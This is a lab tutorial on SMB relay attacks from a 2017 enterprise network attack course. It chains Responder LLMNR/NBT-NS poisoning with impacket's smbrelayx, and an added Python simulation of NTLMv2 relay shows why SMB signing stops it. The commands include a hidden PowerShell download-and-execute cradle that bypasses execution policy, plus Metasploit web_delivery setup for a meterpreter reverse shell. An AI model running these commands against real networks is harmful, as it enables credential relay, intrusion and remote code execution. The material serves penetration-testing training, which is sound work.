Advanced Wireless Attacks Against Enterprise Networks
SMB Relays And LLMNR/NBT-NS Poisoning
© 2017 Gabriel Ryan All Rights Reserved

The impacket toolkit contains an excellent script for performing this type of attack. It is reliable, flexible, and best of all supports attacks against NTLMv2. (In current impacket releases smbrelayx has been superseded by ntlmrelayx.py, which takes the same idea further; the flow below is unchanged.) Let's perform a simple SMB Relay attack using impacket's smbrelayx script.

Before we begin, boot up your Kali VM, Windows DC VM, and Windows AD Victim VM. On your Windows DC VM, type the following command in your PowerShell prompt to obtain its IP address. Do the same on your Windows AD Victim VM to obtain its IP address.

PS C:\> ipconfig

Once you have the IP addresses of both the Windows AD Victim and Windows DC VMs, open a terminal on your Kali VM and run ifconfig to obtain your own IP address.

root@kali:~# ifconfig

On your Kali VM, change directories into /opt/impacket/examples and use the following command to start the smbrelayx script. In the command below, make sure you change the IP address to the right of the -h flag to the IP address of your Windows AD Victim virtual machine; this is the host the captured authentication will be relayed to. Similarly, change the second IP address, the one inside the DownloadString() URL (blank in this preview), to the IP address of your Kali virtual machine. Notice how we pass a PowerShell command to run on the targeted machine using the -c flag. The PowerShell command bypasses the Windows AD Victim VM's execution policy and launches a reverse shell downloaded from your Kali virtual machine.

root@kali:~# python smbrelayx.py -h 172.16.15.189 -c "powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('')"

Once the payload has been generated, use the following commands within Metasploit to launch a server from which to download the reverse shell. As before, change the IP address shown below to the IP address of your Kali virtual machine. The web_delivery listener must be up before the first authentication is relayed, because the -c command above fetches its payload from it at the moment it runs.

msf > use exploit/multi/script/web_delivery
msf (web_delivery) > set payload windows/meterpreter/reverse_tcp
msf (web_delivery) > set TARGET 2
msf (web_delivery) > set LHOST 172.16.15.186
msf (web_delivery) > set URIPATH /
msf (web_delivery) > exploit

Two preconditions are worth checking before you expect a shell. The account whose authentication gets relayed must be a local administrator on the host named by -h, since smbrelayx needs administrative rights there to run the -c command. That host must also not require SMB signing: Windows workstations do not require it by default, but domain controllers do, which is why this lab relays authentication from the DC to the victim workstation rather than the other way round.

The traditional way to perform this attack is to establish a man-in-the-middle position from which to intercept an NTLM exchange. However, we can also perform an SMB Relay attack using the LLMNR/NBT-NS poisoning techniques we learned in the last section. To do this, we simply launch Responder on our Kali machine as we did before. Both Responder and smbrelayx want to answer on TCP port 445; if smbrelayx reports that the port is already in use, turn off the SMB (and HTTP) servers in Responder's configuration file so that only smbrelayx handles the incoming SMB connections.

root@kali:~# responder -I eth0 -wrf

With Responder running, we just need to perform an action on the Windows DC virtual machine that will trigger an NTLM exchange. An easy way to do this is by attempting to access a non-existent SMB share from the Windows DC machine, as shown in the screenshot below.

[Screenshot: the Windows DC VM attempting to open a non-existent SMB share]

You should now see three things happen on your Kali VM. First, you'll see Responder send a poisoned answer to your Windows DC virtual machine for the NetBIOS name of the non-existent server.
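The procedure above works because of how NTLMv2 is built, not because of anything specific to SMB, and that is also why SMB signing stops it. The following added example (my own code, not from the original text or from impacket) models the relay as three parties and no network: the victim that Responder tricked, the attacker playing smbrelayx, and the target named by -h. The NTOWFv2, NTProofStr and SessionBaseKey formulas are the real MS-NLMP ones. Everything else is an assumption or simplification labelled in the comments: the NT hash is a constructed constant rather than MD4 of the password, the target is given the hash directly instead of validating through the DC, and message signing is a simplified 8-byte HMAC-MD5 tag in place of SMB2's HMAC-SHA256.

```python
# Added example: the NTLMv2 math behind an SMB relay, with no SMB framing or sockets.
# MS-NLMP section numbers are cited where the formula is the real one.
import hashlib
import hmac
import os
import struct

# Constructed stand-in for the victim user's NT hash (the real value is MD4(UTF-16LE(password));
# MD4 is left out because not every hashlib build still provides it).
VICTIM_NT_HASH = bytes.fromhex("00112233445566778899aabbccddeeff")
USER, DOMAIN = "jdoe", "CORP"  # constructed account


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """MS-NLMP 3.3.2: NTOWFv2 = HMAC_MD5(NT hash, UTF16LE(UPPER(user) + domain))."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof(ntowf: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """MS-NLMP 3.3.2: NTProofStr = HMAC_MD5(NTOWFv2, ServerChallenge || client blob)."""
    return hmac.new(ntowf, server_challenge + blob, hashlib.md5).digest()


def session_base_key(ntowf: bytes, proof: bytes) -> bytes:
    """MS-NLMP 3.3.2: SessionBaseKey = HMAC_MD5(NTOWFv2, NTProofStr); signing keys derive from it."""
    return hmac.new(ntowf, proof, hashlib.md5).digest()


def sign(key: bytes, seq: int, message: bytes) -> bytes:
    """Simplified signature (assumption): HMAC_MD5(key, seq || message)[:8]; SMB2 really uses HMAC-SHA256."""
    return hmac.new(key, struct.pack("<I", seq) + message, hashlib.md5).digest()[:8]


class Victim:
    """The poisoned host. It answers whatever CHALLENGE it is handed: NTLM never binds the
    response to the server the client believes it is talking to, which is the whole bug."""
    def __init__(self, nt_hash: bytes):
        self.ntowf = ntowf_v2(nt_hash, USER, DOMAIN)
        self.key = None

    def authenticate(self, server_challenge: bytes) -> dict:
        # Minimal NTLMv2_CLIENT_CHALLENGE: RespType, HiRespType, reserved, timestamp, nonce, reserved, empty AvPairs
        blob = b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", 0) + os.urandom(8) + b"\x00" * 8
        proof = nt_proof(self.ntowf, server_challenge, blob)
        self.key = session_base_key(self.ntowf, proof)  # only the victim and the target can compute this
        return {"user": USER, "domain": DOMAIN, "nt_response": proof + blob}


class Target:
    """The host the attacker wants a session on. Simplification: it holds the NT hash itself
    (a real member server asks the DC over Netlogon); optionally it requires signed requests."""
    def __init__(self, nt_hash: bytes, require_signing: bool):
        self.nt_hash, self.require_signing = nt_hash, require_signing
        self.server_challenge, self.sessions = None, {}

    def challenge(self) -> bytes:
        self.server_challenge = os.urandom(8)
        return self.server_challenge

    def accept(self, auth: dict):
        ntowf = ntowf_v2(self.nt_hash, auth["user"], auth["domain"])
        proof, blob = auth["nt_response"][:16], auth["nt_response"][16:]
        if not hmac.compare_digest(proof, nt_proof(ntowf, self.server_challenge, blob)):
            return None
        sid = len(self.sessions) + 1
        self.sessions[sid] = session_base_key(ntowf, proof)
        return sid

    def execute(self, sid: int, seq: int, command: bytes, signature: bytes) -> str:
        if self.require_signing and not hmac.compare_digest(signature, sign(self.sessions[sid], seq, command)):
            return "rejected: bad signature"
        return "executed: " + command.decode()


def relay(victim: Victim, target: Target, command: bytes) -> str:
    """The attacker's side of smbrelayx: shuttle CHALLENGE one way and AUTHENTICATE the other.
    No password or hash ever passes through the attacker, so the session key is out of reach."""
    server_challenge = target.challenge()         # attacker -> target NEGOTIATE; target -> attacker CHALLENGE
    auth = victim.authenticate(server_challenge)  # attacker -> victim same CHALLENGE; victim -> attacker AUTHENTICATE
    sid = target.accept(auth)                     # attacker -> target the forwarded AUTHENTICATE
    if sid is None:
        return "authentication failed"
    return target.execute(sid, 0, command, b"\x00" * 8)  # the relay can only send an unsigned (zero MAC) request


def run_demo(require_signing: bool) -> str:
    return relay(Victim(VICTIM_NT_HASH), Target(VICTIM_NT_HASH, require_signing), b"whoami")


def legitimate_session() -> str:
    """Control case: the real client holds the key, so its signed request passes with signing required."""
    victim, target = Victim(VICTIM_NT_HASH), Target(VICTIM_NT_HASH, True)
    sid = target.accept(victim.authenticate(target.challenge()))
    return target.execute(sid, 0, b"dir", sign(victim.key, 0, b"dir"))


if __name__ == "__main__":
    print("signing not required:", run_demo(False))
    print("signing required:    ", run_demo(True))
    print("legitimate client:   ", legitimate_session())
```

The relay succeeds when the target does not require signing and fails at the first request when it does, while the genuine client signs without trouble: the authentication itself is forwarded untouched in both cases, and only the attacker's inability to derive SessionBaseKey makes the difference.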